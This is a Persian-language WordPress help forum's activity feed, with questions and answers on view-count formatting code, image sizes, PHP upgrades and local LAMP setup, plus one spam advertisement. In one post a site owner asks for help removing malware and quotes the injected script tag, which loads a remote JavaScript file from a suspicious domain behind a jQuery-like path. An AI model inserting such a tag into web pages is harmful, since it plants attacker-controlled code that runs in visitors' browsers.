تمامی فعالیت ها

این جریان به طور خودکار بروز می شود   

1. ساعت گذشته
  2. سلام این فرم دقیقا توسط این آموزش ساخته شده https://bit.ly/31CE2It
  3. خواهش میکنم کد شما به اینصورت میشه echo '<i class="fa fa-eye mi"></i>' . number_format_short( get_post_meta( $post->ID, 'cd_views', true ) ) . 'Video View<br /><br />';
  4. می شه از دوستان خواهش کنم مشکل این افزونه تو سایت ترجمه من رو حل کنن؟ اینا رو می نویسه گشودن بسته‌ی فشرده شده… در حال نصب افزونه… این بسته نمی‌تواند نصب شود. هیچ افزونه‌ی معتبری یافت نشد. نصب افزونه با خطا مواجه شد.
  5. امروز
  6. با تشکر از متن خوبتون ساخت و تولید استند های نمایشگاهی پاپ آپ- رول آپ - میز کانتر-کانتر تاج دار نمایشگاهی- جا کاتالوگی - قاب فنری در مجتمع تبلیغاتی نقش سیَلک با 10 سال سابقه فعالیت در حوزه نمایشگاهی استند های پرتابل نمایشگاهیامروزه بخش عظیمی از نیاز های غرفه های نمایشگاهی را پوشش میدهند سازه های پرتابل نمایشگاهی نه تنها قابلیت جابجایی دارند و پس از اتمام دوره نمایشگاه به سادگی امکان جمع آوری در چند دقیقه را دارند بلکه هزینه های سهمگین غرفه سازی و غرفه آرایی را بسیار کاهش می دهد و نیاز نیست که برای شرکت در هر نمایشگاهی شما هزینه ساخت و ساز غرفه را متقبل شوید کلیه سازه های نمایشگاهی نقش سیَلکاعم از پاپ آپ- استند میز کانتر- استند رول آپ- کاتالوگ استند - استند ایکس همگی شامل گارانتی و خدمات پس از فروش می باشند
  7. سلام خسته نباشید دوستان من یه قسمت سرچ شبیه به این سایت میخوام ایجاد کنم کسی هست راهنمایی کنه؟ http://tahaquran.ir/
  8. درود من تا حالا استفاده نکردم ولی فکر کنم باید در قسمت ssl هاست برید و از اونجا اپدیت کنید Update Certificate با کدی که براتون ارسال کردن.
  9. تغییر ورژن php

درود و خسته نباشید سایت با ورژن php 5.6 داره کار میکنه و حالا که افزونه ها جدیدا ورژن بالاتری میخوان باید ورژن php ببرم بالا! آیا با این کار اتفاقی برای سایتم نمیفته!؟ خراب نمیشه احیانا!؟ دوستانی که تجربه شو دارن لطفا راهنمایی کنن با تشکر
  10. تشکر بابت جواب های دقیقتون اما یه مشکلی که هست من دقیقا همین کارها رو انجام میدم اما کار نمیکنه در واقعه فکر میکنم متغییر اعداد داخل قالب من با اسم دیگه ای تعریف شده اگر به این صورت باشه بازم این کد کار میکنه؟ یا اینکه طرز استفاده رو من اشتباه انجام میدم echo '<i class="fa fa-eye mi"></i>' . number_format_i18n( (int) get_post_meta( $post->ID, 'cd_views', true ) ) . 'Video View<br /><br />';
  11. سلام دوستان. در وردپرس با گراویتی فرمز، هر فرمی که می سازم، با فعال کردن ایجکس مطالب ارسال میشه اما تاییدیه نمایش داده نمی شه. ولی وقتی تیک ایجکس رو برمی دارم فرم به درستی کار می کنه. لطفا راهنمایی کنید
  12. تماس گرفتم اصلا پاسخ ندادن ، ولی فکر کنم ssl بستر درگاههای پرداخت رو تغییر دادن و اطلاع رسانی کردن ، همین و کاری نباید انجام بشه چون دقیقا شاپرک سال 95 هم این کار رو کرده
  13. سلام، اول پیشنهاد میدم قبل از اینکه همه بخش های قالب مثل وبلاگ ، پست هتایپهای اختصاصی و ... هر جا که عکسی کار شده ، چک کنید ببینید از چه سایزی استفاده میکنن ، بعد وارد کدهای مختص هر بخش بشید، میبینید که سایز تصاویر با با بخش add_image-size مطابقت داره ، همه رو به یک سایز مشخص تغییر باید بدید بعد چک کنید مشکلی در نمایش قالب به وجود نیاد ، اونوقت تصاویر سایزهایی که نمیخواید رو حذف کنید دوم تنظیمات قالبتون رو چک کنید، اکثر مواقع قالب راهنماهایی داره برای این بخش ها موفق و پیروز باشید
  14. خب به این دلیله که استفاده از یه تگ h داخل تگ p مجاز نیست باید وارد (<>) بشید و اون پاراگرافی که میخواید داخلش متن با h باشه رو به div تغییر بدید پیشنهاد میدم اگه میخواین از تگ h برای بلد کردن کلمه تو پاراگراف استفاده کنید ، این کار رو نکنید بهتره که با b و تغییر سایز فونت به اندازه دلخواهتون تغییرش بدید و برای سئو بهتر اگه کلمه خیلی مهمی هست بسته به اهمیت کلمه از ایتالیک و رنگ و آندرلاین استفاده کنید
  15. دیروز
  16. اگه کلمه در آخر جمله باشه جواب میده یه اینتر و بعد تگ رو بهش میدم و بعد برمیگردونم سر جای اولش مثل کلمات نرم افزار openiv اما اگه وسط جمله باشه جوال نمیده و تمام جمله رو تگ اچ2 میده مثل عکس زیر
  17. توی فانکشن قالب های وردپرس برای اینکه تصاویر به درستی در همه بخش ها نمایش داده بشه و بهینه باشه برای لود هر صفحه از تابع add_image_size استفاده میشه داخل فانکشن چک کنید میتونید ببینید چه سایزهایی برای قالبتون تنظیم شده و برای چه قسمتایی هست و بعد متناب با نیازتون تغییر بدید ابتدا باید این تغییرات رو انجام بدید بعد میتونید عکسها تو سایزهایی که نمیخواید رو حذف کنید ، توی رسانه نمیشه این کار رو کرد ، باید یا پوشه آپلود رو دانلود کنید و سایزها رو جستجو بزنید و یک هو پاکشون کنید یا اینکه افزونه های مدیریت تصاویر نصب کنید در ضمن اگر بخش مدیریت سایز تصاویر داره فکر کنم باید غیر فعالش کنید به نظرم این امکان وردپرس هم یه مزیته هم یه معضل ، مزینه چون در همه بخشهای سایت تصاویر برش میخورن و بهینه هست و معضل که دقیقا هاست رو پر میکنن
  18. سلام در ادامه راهنمایی دوست عزیز @soma به راحتی میتونید ی فانکشن تعریف و در هرجایی از وبسایت ازش استفاده کنید بفرمایید کد فانکشن function number_format_short( $number, $precision = 1 ) { if ($number < 900) { $n_format = number_format($number, $precision); $suffix = ''; } else if ($number < 900000) { $n_format = number_format($number / 1000, $precision); $suffix = 'K'; } else if ($number < 900000000) { $n_format = number_format($number / 1000000, $precision); $suffix = 'M'; } else if ($number < 900000000000) { $n_format = number_format($number / 1000000000, $precision); $suffix = 'B'; } else { $n_format = number_format($number / 1000000000000, $precision); $suffix = 'T'; } if ( $precision > 0 ) { $dotzero = '.' . str_repeat( '0', $precision ); $n_format = str_replace( $dotzero, '', $n_format ); } return $n_format . $suffix; } استفاده از فانکشن در سراسر وب و تبدیل مقدار دلخواه echo number_format_short(1234); // 1234 = 1.2K توجه داشته باشید تابع دو مقدار میگیره مقدار اول که همون عدد دلخواه هست و مقدار دوم در صورتی که برابر با 0 باشه اعشار حذف میشه مثلا 1.2K میشه 1K ( پیشفرض برابر با 1 شده که اعشار رو حذف نکنه )
  19. درود به همگی دوستان و اساتید عزیز آقا یه مشکلی که دارم اینه که یه تصویر رو وقتی آپلود میکنم تبدیل به ۶ تا تصویر در سایزهای مختلف میشه چطوری باید جلوی این حرکتو بگیرم و میخوام فقط تصویر برای تصاویر شاخص باشه و دیگه نمیخوام کپی بشه چون من تصاویری که برای مطالب استفاده میکنم بصورتی هستش که لینک مستقیم میدم بهش و داخل هاست آپلود نمیکنم و چند روز پیش که داشتم چک میکردم دیدم یه عالمه تصویر داخل هاستم هستش من کلا 200 تا مطلب دارم و نهایتا 300 تصویر مرتبط با تصاویر ولی بیشتر از 1000 تا عکس توی هاستم دارم اینم بگم در منوی تنظیمات - رسانه - یه سری گزینه بود مربوط به سایز تصویر که همشو صفر کردم ولی بازم 6 تا کپی از تصاویر آپلود شده میده و یک سوالی که الان برام پیش اومده این هستش که چطور میتونم تصاویر اضافه رو حذف کنم؟ یعنی باید دونه دونه پاکشون کنم؟ راهی هستش که بشه تصاویری که استفاده نمیشه رو بصورت اتومات حذف کرد؟؟؟ ممنون از لطفتون
  20. باسلام و احترام، صفحه اصلی سایتم چیز خاصی نبود فقط چند تا ساب دامین داشتم که به ای پی های دیگه ای متصل بودن حدود 1/2 ماه لاگین نکرده بودم به علت نبود وقت و.. یهو امروز متوجه شدم صفحه لاگین ریدایرکت میشه خلاصه رفتم توی پی اچ پی ادمین و این ریدایرکت شدن رو درست کنم اما هنوز سایت https://sitecheck.sucuri.net سایتمو ویروسی نشون میده! دوستانی که میدونن چجوری باید این کد مخرب رو از سایتم پاک کنم لطفا کمک کنن <script type='text/javascript' src='https://d1.littleandbiggreenballlon.com/destiny.js?tt=1&#038;/wp-includes/js/jquery/jquery_js'></script> تصویر هم پیوست شد. متشکرم
  21. سلام کد زیر یه راه خیلی ساده برای اینکار هست ،میتونید ازش استفاده کنید برای اینکه تابع کاملی بنویسید برای هدف مورد نظرتون متغیر تعداد بازدید باید تقسیم بر 1000 بشه . در این مرحله تا 999 هزار بازدید رو جواب میده ،برای میلیون بازدید هم باید یه شرط بگذارید و متغیر تعداد بازدید رو بر 1میلیون تقسیم کنید و همینطور برای بازدید های بیشتر از 999 میلیون ... الی آخر میتونید تابع و شروطش رو بنویسید همینطور اگه عدد مثلا 3500 تا هست با این روش به عدد بزرگتر یعنی 4 تبدیل میشه <?php $mim= 35000; echo number_format($mim) ; echo '<br>' ; $sin= $mim / 1000; echo number_format($sin) . 'K' ; ?> خروجی دقیقا این میشه 35,000 35K
  22. برای من هم اومده ، کدی شبیه ssl داره، فک کنم باید با خود به پرداخت تماس بگیریم
  23. هر بار که سیتمتون رو خاموش میکنید ، نرم افزار لمپ رو باید run کنید تا سرور _ آپاچی و ... ) روی سیستمتون راه بیافته
  24. خیلی ساده است ، از بخش تنظمیات کدی ادیتور میتونید چک کنید که آیا سطرها و پاراگراف ها از هم با html جدا شده یا نه من خودم با تاینی توی وردپرس کار نکردم ، ولی تاینی توی cms دیگه ای این امکان رو با عنوان sorcecode میده . همینطور اگه متنتون رو از نوتپد داخل ادیتور کپی کنید ، کل پاراکراف ها و سطرها ظاهرا جدا هستن ولی در واقع یکپارچه هستن پیشنهاد میدم حتما بعد از هر سطر و پاراگراف یک اینتر بزنید بعد اون عیارت که میخواید رو درگ کنید تگ مورد نظرتون رو بهش بدید
  25. این قالب پریمیوم هست ، قوانین انجمن هست که بحش و گفتگو درباره قالب پریمیوم ممنوع هست باید از سازنده قالب که قالب رو ازش خریداری کردید سوالاتتون رو بپرسید ، همینطور این قالب راهنمایی های زیادی توی اینترنت داره ،یه جستجو بزنید آموزش تنظیمات قالب صحیفه آموزشهای زیادی باز میشه
  26. سلام مراحل نصب وردوپرس و لمپ روی سیستم ابونتو من انجام شده و بعد از ساخت دیتابیس و مراحل اولیه و واردشدن به صفحه سایتم در لوکال هاست و استفاده از ان بعداز خاموش کردن سیستم و تلاش مجدد در روز بعد موفق به دسترسی به صفحه سایتم نشدم با ادرس localhost/phpmyadmin به اررور mysql said connection field و با ادرس localhost/mydatabasename با اررور establishing database مواجه شدم کدهای مربوطه در اینترنت هم در اخر جواب نمیدهد
  27. با درود من یک افزونه ی سفارش گیری میخوام ، دارم از سیستم edd استفاده می کنم چیزی که من می خوام به این شرحه : مشتری بیاد رو لینک " ثبت سفارش کلیک کنه " ، بعد انتخاب کنه مثلا کارت ویزیت می خواد ، بعدش تحریر رو انتخاب کنه مثلا 80 گرم می خواد یا 100 گرم ، بعدش تعداد تیراژ رو انتخاب کنه و به همین ترتیب ، آخرش هم فایلشو آپلود کنه و با توجه به انتخاب هایی که کرده هزینه رو بره درگاه پرداخت کنه چه افزونه ای پیشنهاد میدید ؟ نکته : ووکامس نیستم ! EDD هستم سپاس از شما
  1. نمایش فعالیت های بیشتر